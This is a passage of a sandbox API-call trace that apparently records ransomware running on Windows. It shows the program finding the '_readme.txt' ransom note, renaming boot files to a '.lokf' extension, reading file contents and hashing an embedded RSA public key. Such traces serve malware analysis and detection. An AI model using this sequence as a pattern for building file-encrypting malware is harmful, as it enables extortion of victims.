Flags=0x0, Size=0x20) returned 0x328ee00 [0056.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.446] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0056.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.446] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.446] PathFindFileNameW (pszPath="") returned="" [0056.447] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.447] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0056.447] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0056.447] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3297a68 [0056.447] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0056.447] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5da58 [0056.447] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e5e0 [0056.447] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.447] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.447] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0056.447] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e5e0 | out: hHeap=0x660000) returned 1 [0056.447] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0056.447] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e5e0 [0056.447] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5da58 [0056.447] PathAppendW (in: pszPath="C:\\Boot\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\_readme.txt") returned 1 [0056.447] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.447] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e5e0 | out: hHeap=0x660000) returned 1 [0056.447] PathFileExistsW (pszPath="C:\\Boot\\_readme.txt") returned 1 [0056.448] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e5e0 [0056.448] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea15050, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea15050, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.448] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e5e0 | out: hHeap=0x660000) returned 1 [0056.448] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea15050, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea15050, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.448] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0056.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e5e0 [0056.448] PathFindExtensionW (pszPath="C:\\Boot\\BCD") returned="" [0056.448] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e5e0 | out: hHeap=0x660000) returned 1 [0056.448] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x469b3b00, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0056.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e5e0 [0056.448] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG") returned=".LOG" [0056.448] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0056.448] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e5e0 | out: hHeap=0x660000) returned 1 [0056.448] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0056.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e5e0 [0056.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0056.449] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e5e0 | out: hHeap=0x660000) returned 1 [0056.449] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG1") returned=".LOG1" [0056.449] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0056.449] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=0) returned 1 [0056.449] CloseHandle (hObject=0x5cc) returned 1 [0056.449] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0056.449] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.449] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0056.449] MoveFileW (lpExistingFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), lpNewFileName="C:\\Boot\\BCD.LOG1.lokf" (normalized: "c:\\boot\\bcd.log1.lokf")) returned 1 [0056.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0056.450] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0056.450] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e5e0 [0056.450] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0056.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e5e0 | out: hHeap=0x660000) returned 1 [0056.450] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG2") returned=".LOG2" [0056.450] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0056.450] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=0) returned 1 [0056.450] CloseHandle (hObject=0x5cc) returned 1 [0056.450] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0056.450] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0056.450] MoveFileW (lpExistingFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), lpNewFileName="C:\\Boot\\BCD.LOG2.lokf" (normalized: "c:\\boot\\bcd.log2.lokf")) returned 1 [0056.451] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.451] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0056.451] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0056.451] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e5e0 [0056.451] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0056.451] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e5e0 | out: hHeap=0x660000) returned 1 [0056.451] PathFindExtensionW (pszPath="C:\\Boot\\BOOTSTAT.DAT") returned=".DAT" [0056.451] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0056.451] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=65536) returned 1 [0056.451] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0056.454] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xffda, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0056.454] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0056.462] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0056.462] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x10000, lpOverlapped=0x0) returned 1 [0056.463] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0056.463] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x326a590 [0056.463] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0056.463] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0056.468] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0056.469] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0056.469] CryptHashData (hHash=0x327ca80, pbData=0x326a590, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0056.469] CryptGetHashParam (in: hHash=0x327ca80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0056.469] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x32414e8 [0056.469] CryptGetHashParam (in: hHash=0x327ca80, dwParam=0x2, pbData=0x32414e8, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x32414e8, pdwDataLen=0x9f4fa54) returned 1 [0056.474] GetLastError () returned 0x0 [0056.479] SetLastError (dwErrCode=0x0) [0056.479] GetLastError () returned 0x0 [0056.479] SetLastError (dwErrCode=0x0) [0056.480] GetLastError () returned 0x0 [0056.480] SetLastError (dwErrCode=0x0) [0056.485] GetLastError () returned 0x0 [0056.485] SetLastError (dwErrCode=0x0) [0056.485] GetLastError () returned 0x0 [0056.485] SetLastError (dwErrCode=0x0) [0056.485] GetLastError () returned 0x0 [0056.485] SetLastError (dwErrCode=0x0) [0056.485] GetLastError () returned 0x0 [0056.485] SetLastError (dwErrCode=0x0) [0056.485] GetLastError () returned 0x0 [0056.485] SetLastError (dwErrCode=0x0) [0056.485] GetLastError () returned 0x0 [0056.485] SetLastError (dwErrCode=0x0) [0056.485] GetLastError () returned 0x0 [0056.485] SetLastError (dwErrCode=0x0) [0056.485] GetLastError () returned 0x0 [0056.485] SetLastError (dwErrCode=0x0) [0056.485] GetLastError () returned 0x0 [0056.485] SetLastError (dwErrCode=0x0) [0056.485] GetLastError () returned 0x0 [0056.485] SetLastError (dwErrCode=0x0) [0056.485] GetLastError () returned 0x0 [0056.485] SetLastError (dwErrCode=0x0) [0056.485] GetLastError () returned 0x0 [0056.485] SetLastError (dwErrCode=0x0) [0056.485] GetLastError () returned 0x0 [0056.485] SetLastError (dwErrCode=0x0) [0056.485] GetLastError () returned 0x0 [0056.486] SetLastError (dwErrCode=0x0) [0056.486] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e5e0 [0056.486] GetLastError () returned 0x0 [0056.486] SetLastError (dwErrCode=0x0) [0056.486] GetLastError () returned 0x0 [0056.486] SetLastError (dwErrCode=0x0) [0056.486] GetLastError () returned 0x0 [0056.486] SetLastError (dwErrCode=0x0) [0056.486] GetLastError () returned 0x0 [0056.486] SetLastError (dwErrCode=0x0) [0056.486] GetLastError () returned 0x0 [0056.486] SetLastError (dwErrCode=0x0) [0056.486] GetLastError () returned 0x0 [0056.486] SetLastError (dwErrCode=0x0) [0056.486] GetLastError () returned 0x0 [0056.486] SetLastError (dwErrCode=0x0) [0056.486] GetLastError () returned 0x0 [0056.486] SetLastError (dwErrCode=0x0) [0056.486] GetLastError () returned 0x0 [0056.486] SetLastError (dwErrCode=0x0) [0056.486] GetLastError () returned 0x0 [0056.486] SetLastError (dwErrCode=0x0) [0056.486] GetLastError () returned 0x0 [0056.486] SetLastError (dwErrCode=0x0) [0056.486] GetLastError () returned 0x0 [0056.486] SetLastError (dwErrCode=0x0) [0056.486] GetLastError () returned 0x0 [0056.486] SetLastError (dwErrCode=0x0) [0056.486] GetLastError () returned 0x0 [0056.487] SetLastError (dwErrCode=0x0) [0056.487] GetLastError () returned 0x0 [0056.487] SetLastError (dwErrCode=0x0) [0056.487] GetLastError () returned 0x0 [0056.487] SetLastError (dwErrCode=0x0) [0056.487] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0056.487] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e5e0 | out: hHeap=0x660000) returned 1 [0056.487] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32414e8 | out: hHeap=0x660000) returned 1 [0056.487] CryptDestroyHash (hHash=0x327ca80) returned 1 [0056.487] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0056.487] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a590 | out: hHeap=0x660000) returned 1 [0056.492] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0056.492] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0056.492] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257668 [0056.492] RpcStringFreeA (in: String=0x9f4fa40 | out: 